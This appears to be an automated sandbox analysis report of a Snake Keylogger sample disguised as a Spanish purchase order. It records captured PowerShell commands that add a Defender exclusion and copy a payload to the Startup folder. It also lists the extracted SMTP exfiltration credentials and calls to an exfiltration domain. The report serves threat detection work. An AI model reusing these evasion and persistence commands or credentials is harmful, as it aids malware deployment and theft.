Author: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7924, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 8012, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe", ParentImage: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe, ParentProcessId: 7596, ParentProcessName: NUEVA ORDEN DE COMPRAsxlx..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force, ProcessId: 7812, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7924, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 8012, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "davin2024@gbogboro.com", "Password": "Lovelove@123", "Host": "mail.gbogboro.com", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 18%	Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for submitted file

Source: NUEVA ORDEN DE COMPRAsxlx..exe	Virustotal: Detection: 66%			Perma Link
Source: NUEVA ORDEN DE COMPRAsxlx..exe	ReversingLabs: Detection: 83%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NUEVA ORDEN DE COMPRAsxlx..exe PID: 7596, type: MEMORYSTR

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.3:49715 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49728 version: TLS 1.2

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Accessibility.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Accessibility.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Accessibility.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: RegSvcs.pdb, source: .exe, 00000015.00000000.1532499093.0000000000412000.00000002.00000001.01000000.00000009.sdmp, .exe.13.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: \/.dll.pdb source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1488764594.0000014F10011000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1398908438.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: RegSvcs.pdb source: .exe, 00000015.00000000.1532499093.0000000000412000.00000002.00000001.01000000.00000009.sdmp, .exe.13.dr
Source:	Binary string: System.Configuration.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Xml.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: RegSvcs.exe, 00000009.00000002.1422566777.0000000005210000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1414576707.0000000002A41000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.pdbA source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdbRSDSw source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdb8 source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEE171h	16_2_00DEDEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DED469h	16_2_00DED1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEA4A1h	16_2_00DEA1F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DE9799h	16_2_00DE94F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DE9341h	16_2_00DE9098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEC761h	16_2_00DEC4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEBA59h	16_2_00DEB7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEAD51h	16_2_00DEAAA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEA049h	16_2_00DE9DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEB601h	16_2_00DEB358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEA8F9h	16_2_00DEA650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DE9BF1h	16_2_00DE9948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DE8EE9h	16_2_00DE8C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEDD19h	16_2_00DEDA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DED011h	16_2_00DECD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEC309h	16_2_00DEC060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DED8C1h	16_2_00DED618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DECBB9h	16_2_00DEC910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEBEB1h	16_2_00DEBC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEB1A9h	16_2_00DEAF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00DEE5C9h	16_2_00DEE320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E460D5h	16_2_00E45D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E45339h	16_2_00E45090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E434A9h	16_2_00E43200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E44609h	16_2_00E44360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E45791h	16_2_00E454E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E43901h	16_2_00E43658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E44A8Ah	16_2_00E447E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E45BE9h	16_2_00E45940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E42BD1h	16_2_00E42928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E43D59h	16_2_00E43AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_00E40B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_00E40B38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E44EE1h	16_2_00E44C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E43051h	16_2_00E42DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00E441B1h	16_2_00E43F08

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.3:49715 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: scratchdreams.tk

Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 0000000D.00000002.1450479614.0000000007434000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro7
Source: powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1423330809.0000000004498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1450479614.000000000741A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 0000000D.00000002.1423330809.0000000004341000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002C32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 0000000D.00000002.1423330809.0000000004498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1450479614.000000000741A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.1423330809.0000000004341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.1423330809.0000000004498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1450479614.000000000741A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175H
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175x
